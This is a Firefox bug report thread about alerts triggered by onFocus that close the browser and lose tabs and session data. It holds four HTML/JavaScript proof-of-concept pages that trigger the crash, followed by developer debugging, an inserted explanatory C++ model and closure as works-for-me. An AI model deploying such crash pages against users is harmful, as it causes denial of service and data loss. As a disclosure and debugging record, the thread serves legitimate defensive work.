Closed Bug 640127 Opened 13 years ago Closed 3 years ago

If I close An Alert Started By An onFocus Event, With The [x] button on Document Load, FireFox Closes/Crashes??

Categories

(Core :: DOM: Events, defect, P5)

All
Windows XP
defect

RESOLVED WORKSFORME

People

(Reporter: cjb.exploit, Unassigned)

Details

(Keywords: crash, dataloss, testcase, Whiteboard: [sg:dos] )

Attachments

(6 files)

User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.14) Gecko/20110218 Firefox/3.6.14
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.14) Gecko/20110218 Firefox/3.6.14

If An Alert/Prompt/Confirm or Wrong Protocol Error-Alert Is Activated With An onFocus Event in the <BODY>.
If The First Prompt Is Closed With The [x] button, 
Focus Taken Away From FireFox, 
Clicking {OK} or [x] On The Next Alert/Prompt/Confirm or Wrong Protocol Error-Alert. 
Causes FireFox To Close/Crash? Its Tabs And Windows With No Restore Options Available on Restart.

Reproducible: Always

Steps to Reproduce:
I Have Managed To Reproduce This In The Below Script/POC's

------------------------Main-POC------------------------------

<body onFocus='JavaScript:{
cjb = new Number( document.getElementById( "counter" ).value );
document.getElementById( "counter" ).value = ( cjb - 1 );
{
if ( cjb == 0 ) ;
}
{
if ( cjb == 1 ) alert( "Click {ok} Or [x]" );
}
{
if ( cjb == 2 ) alert("Clicking [x] Primes The Crash?");
}
};'><input type='hidden' id='counter' value='2'></body>

------------------------EOF-MainPOC---------------------------

--------------------------POC1--------------------------------

1.open POC1 Follow Steps
1a. Click [x]
1b. Click {OK} or [x]


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title></title>
</head>
<body onFocus='JavaScript:{
cjb = new Number( document.getElementById( "counter" ).value );
document.getElementById( "counter" ).value = ( cjb - 1 );
{
if ( cjb == 0 ) ;
}
{
if ( cjb == 1 ) alert( "Click {ok} Or [x]" );
}
{
if ( cjb == 2 ) alert("Clicking [x] Primes The Crash? \n"+
"Attacker Could Use About 80+ \\n To Force [x]"+
"\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n"+
"\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n"+
"\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n"+
"\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n");
}
};'>
<input type='hidden' id='counter' value='2'>
</body>
</html>

--------------------------EOF-POC1----------------------------

----------------------------POC2------------------------------

2.open POC2 Follow Steps {This Affects 4.12b }
1a. Click [x]
1b. Click {OK} or [x]

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title></title>
</head>
<body onFocus='javascript:{
cjb = new Number( document.getElementById( "counter" ).value );
document.getElementById( "counter" ).value = ( cjb - 1 );
{
if ( cjb == 0 ) ; 
}
{
if ( cjb == 1 ) alert( "Click {ok} Or [x]" );
}
{
if ( cjb == 2 ) document.getElementById( "Target" ).src="FORCETHEPRESSOFXzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz:";
}
};'>
<iframe id="Target" src='' 
name="Target" 
width="0"
height="0">
</iframe>
<input type='hidden' id='counter' value='2'>
</body>
</html>

--------------------------EOF-POC2----------------------------

----------------------------POC3------------------------------

3.open POC3 Follow Steps {This Example Doesn't Work For latest Beta But Could}
3a. Click Modal-Dialog
3b. Click [x]
3c. Click {OK} or [x]
3d. Close Dialog

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html><head><title></title></head>
<body>
<center>
<input type='button' value='Modal-Dialog'
onClick='javascript:{
var Inject = document.getElementById("InjectString").value;
var Header = document.getElementById("Modal_Header").value;
window.showModalDialog( Header + Inject,
"Arguments",
"edge: Raised; "+
"center: No; "+
"status: No; "+
"resizable: No; "+
"dialogTop: 286px; "+
"dialogLeft: 998px; "+
"dialogWidth: 1214px; "+
"dialogHeight: 405px; ")}'>
</center>
<input id='Modal_Header'
type='hidden'
value="data:text/html;charset=utf-8,">
<input id='InjectString'
type='hidden'  
value="<html><body onFocus='JavaScript:{cjb = new Number( document.getElementById( &#34;counter&#34; ).value );document.getElementById( &#34;counter&#34; ).value = ( cjb - 1 );{if ( cjb == 0 ) Create( &#34;Error&#34;, &#34;inErrorConsoleo&#34; );}{if ( cjb == 1 ) alert( &#34;Click {ok} Or [x]&#34; );}{if ( cjb == 2 ) alert( &#34;Clicking [x] Primes The Crash? \n&#34;+&#34;Attacker Could Use About 80+ \\n To Force [x]&#34;+&#34;\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n&#34;+&#34;\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n&#34;+&#34;\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n&#34;+&#34;\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n&#34;);}};'><input type=hidden id=counter value=2></body></html>">
</body>
</html>

--------------------------EOF-POC3----------------------------

This Snip Alerts A Message After Application Closes/Crashes

----------------------------POC4------------------------------
<body onFocus='JavaScript:{ 
x = new Number( document.getElementById( "counter" ).value );
if ( x == 0 ) CreateError( InErrorConsole );
else
document.getElementById( "counter" ).value = ( x - 1 );
alert( "press [x] " + x + " more times" ); 
};'
onLoad='JavaScript:{alert("Crash Or Close?")};'>
<input type='hidden' id='counter' value='2'></body>
--------------------------EOF-POC4----------------------------
Actual Results:  
FireFox Closed or Crashed 
With No Warnings Or Options To Restore Windows, Tabs And Data

Expected Results:  
Not Crash/Close.
Warnings.
Restore Options.

If Two Windows Are Open (errorconsole,bookmarks etc...) Closing The Second Window With [x] Causes The Close/Crash.

If Sequence called in modaldialog On the Close Of The dialog window With [x] FireFox Closes/Crashes All Tabs/Windows depending On How Many Are open {POC3}.

Tested With The Latest Beta release 4.12b,
Didn't Work At First But An Alert Dialog Can Still Be Activated with { Wrong Protocol Error-Alert {POC2} } So Also Affects The Latest Beta release
note: Beta 4.12b Does Have option To Restore On Home Page and Warns On Multi Tab close.

Please use the "Add an attachment" link on the bug report to upload
your files. Thanks.
Attached file POC-1
(In reply to comment #1)
> Please use the "Add an attachment" link on the bug report to upload
> your files. Thanks.

Example Files Uploaded :)
Hardware: x86 → All
Attachment #518278 - Attachment mime type: text/plain → text/html
Attachment #518279 - Attachment is private: true
Attachment #518279 - Attachment mime type: text/plain → text/html
Attachment #518279 - Attachment is private: false
Attachment #518280 - Attachment mime type: text/plain → text/html
Attachment #518281 - Attachment mime type: text/plain → text/html
Attachment #518282 - Attachment mime type: text/plain → text/html
I do not see a problem on Mac. There's no 'x' button to close the modal dialogs, but "Esc" is supposed to do the equivalent.

On a windows machine I can reproduce the problem by clicking the built-in "x" close-window button, but not if I hit Esc to cancel the first dialog. Why would that be any different? When it goes down it goes down fast -- no crash reporter comes up.

Didn't have a newer windows debug build than 3.5.x handy, but in that version I get the following assertions before the crash:

Somewhat early
WARNING: requested removal of nonexistent window: nsWindowWatcher.cpp, line 1220

a few (4)
WARNING: getting z level of unregistered window: nsWindowMediator.cpp, line 635

Then
ASSERTION: consider quit stopper out of bounds: 'mConsiderQuitStopper > 0', nsAppStartup.cpp, line 413
ASSERTION: Uh, LeaveModalState() called w/o a reachable top window?: 'Error', nsGlobalWindow.cpp, line 4514
WARNING: NS_ENSURE_SUCCESS(rv, 0) failed with result 0x8000FFFF: nsContentUtils.cpp, line 2717
ASSERTION: consider quit stopper out of bounds: 'mConsiderQuitStopper > 0', nsAppStartup.cpp, line 413

Remember those line numbers are from a really old build.
Status: UNCONFIRMED → NEW
Ever confirmed: true
Kind of looks like we're shutting down on purpose, cleanly. After the assertions I see some of the usual shutdown assertions and the "--DOMWINDOW == XX" debug spew cleanly counting down as objects are freed.
I don't see any problem in Firefox 3.6.15 on Linux.
No problem in local (Linux x86-64) 1.9.2 debug build either.

In a local (Linux x86-64) mozilla-central debug build I saw a few
###!!! ASSERTION: Some mouse button down events are nested?: '!aDocument || !mMouseDownEventHandlingDocument', file dom/base/nsFocusManager.h, line 99
###!!! ASSERTION: mArguments wasn't cleaned up properly!: '!mArguments', file dom/base/nsGlobalWindow.cpp, line 993
but no problem other than that.

I will try on Win XP too...
(In reply to comment #8)
> Didn't have a newer windows debug build than 3.5.x handy [...]

Just to be clear, 3.5.x only applied to the debug version. I also reproduced on 3.6.16pre and (with POC-2) 4.0b12 on Windows.
Attached file stack
I can reproduce the bug on Windows XP.  Here's a stack with a breakpoint
in nsGlobalWindow::Close() - it appears we have nested modal loops here.
I suspect this is the root cause of the bug.  The difference between
Windows and other platforms could be focus handling.

It doesn't look like a security issue though.  I think the worst that could
happen is data loss - losing your session, preferences, bookmarks etc.
Keywords: dataloss
Whiteboard: [sg:dos?]
Group: core-security
Keywords: crash, testcase
Whiteboard: [sg:dos?] → [sg:dos]
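
Added example (not part of the bug thread and not Firefox source): a simplified C++ model of the behaviour the comments above describe, where the "requested removal of nonexistent window" warning is followed by the `mConsiderQuitStopper > 0` assertion and a clean shutdown with no crash reporter. It assumes that a nested modal loop delivers the same window close twice and that each close releases one quit stopper; `AppModel`, `OpenWindow`, `CloseWindow` and the `guarded` flag are hypothetical names, and only `mConsiderQuitStopper` is taken from the quoted assertion text.

```cpp
#include <cstdio>
#include <set>

// Simplified model, NOT Firefox source. All names are hypothetical except
// mConsiderQuitStopper, which comes from the assertion quoted in the thread.
struct AppModel {
    int mConsiderQuitStopper = 0;  // outstanding reasons to keep running
    bool quitRequested = false;    // set when the counter reaches zero
    std::set<int> windows;         // registered top-level window ids
    bool guarded;                  // true = hardened variant

    explicit AppModel(bool g) : guarded(g) {}

    void OpenWindow(int id) {
        windows.insert(id);
        ++mConsiderQuitStopper;    // each open window holds one stopper
    }

    // Called when a window closes. Assumption of this model: nested modal
    // loops can deliver the close for the same window more than once.
    void CloseWindow(int id) {
        bool wasRegistered = windows.erase(id) > 0;
        if (!wasRegistered) {
            std::puts("WARNING: requested removal of nonexistent window");
            if (guarded) return;   // hardened: unknown window holds no stopper
        }
        --mConsiderQuitStopper;    // unguarded: decrements even for a duplicate
        if (mConsiderQuitStopper <= 0) quitRequested = true;  // clean quit path
    }
};

// Browser window (id 1) plus one modal dialog (id 2). The dialog's close is
// delivered twice; the browser window itself is never closed by the user.
bool QuitsAfterDoubleClose(bool guarded) {
    AppModel app(guarded);
    app.OpenWindow(1);
    app.OpenWindow(2);
    app.CloseWindow(2);
    app.CloseWindow(2);  // duplicate close from the nested modal loop
    return app.quitRequested;
}

int main() {
    std::printf("unguarded quits: %d\n", QuitsAfterDoubleClose(false));
    std::printf("guarded quits:   %d\n", QuitsAfterDoubleClose(true));
    return 0;
}
```

In the unguarded variant the duplicate close releases the stopper still held by the open browser window, so the model quits through its normal exit path; the guarded variant ignores a close for a window it no longer tracks.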
https://bugzilla.mozilla.org/show_bug.cgi?id=1472046

Move all DOM bugs that haven’t been updated in more than 3 years and have no one currently assigned to P5.

If you have questions, please contact :mdaly.
Priority: -- → P5

Closing this issue as Resolved > Worksforme since none of the attached files (after following the given steps) crash any of the latest versions of Firefox Nightly, beta or release on Windows 10.

Status: NEW → RESOLVED
Closed: 3 years ago
Resolution: --- → WORKSFORME